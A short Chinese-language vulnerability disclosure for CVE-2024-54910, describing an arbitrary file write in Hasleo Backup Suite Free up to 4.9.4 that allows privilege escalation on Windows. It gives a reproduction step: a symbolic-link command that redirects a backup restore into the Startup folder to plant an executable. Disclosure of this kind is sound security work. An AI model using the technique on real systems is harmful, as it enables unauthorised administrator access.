https://www.cve.org/CVERecord?id=CVE-2024-54910
本文档探讨了一个允许任意文件写入的漏洞,该漏洞可导致安装了 Hasleo Backup Suite Free <= 4.9.4 的 Windows 系统发生权限提升。它演示了备份恢复操作如何与符号链接及低权限用户操作相结合,从而覆盖关键系统文件或在敏感目录中放置恶意可执行文件,使攻击者能够获得管理员访问权限。该方法分为两个阶段:利用文件写入漏洞,以及通过在 Windows 启动文件夹中放置恶意负载来提升权限。
受影响版本:Hasleo Backup Suite Free <= 4.9.4
主机规格:Microsoft Windows 10 Pro 64 位 10.0.19045
任意文件写入 在恢复备份时测试文件权限,我发现该文件会以管理员权限被写入到我们指定的任何位置,并创建文件的完整路径,例如 C+\其余路径。 我们将以低权限用户的身份逐步执行每个步骤。
复现步骤:
为了提升我们的权限,例如我们可以在 Windows 启动文件夹中放置一个可执行文件:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hasleo Backup Suite>C:\SymbolicLinks\CreateSymlink.exe C:\C+\Temp\pwned.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FULLPWN.exe"
Opened Link \RPC Control\pwned.exe -> ??\C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FULLPWN.exe: 00000138 Press ENTER to exit and delete the symlink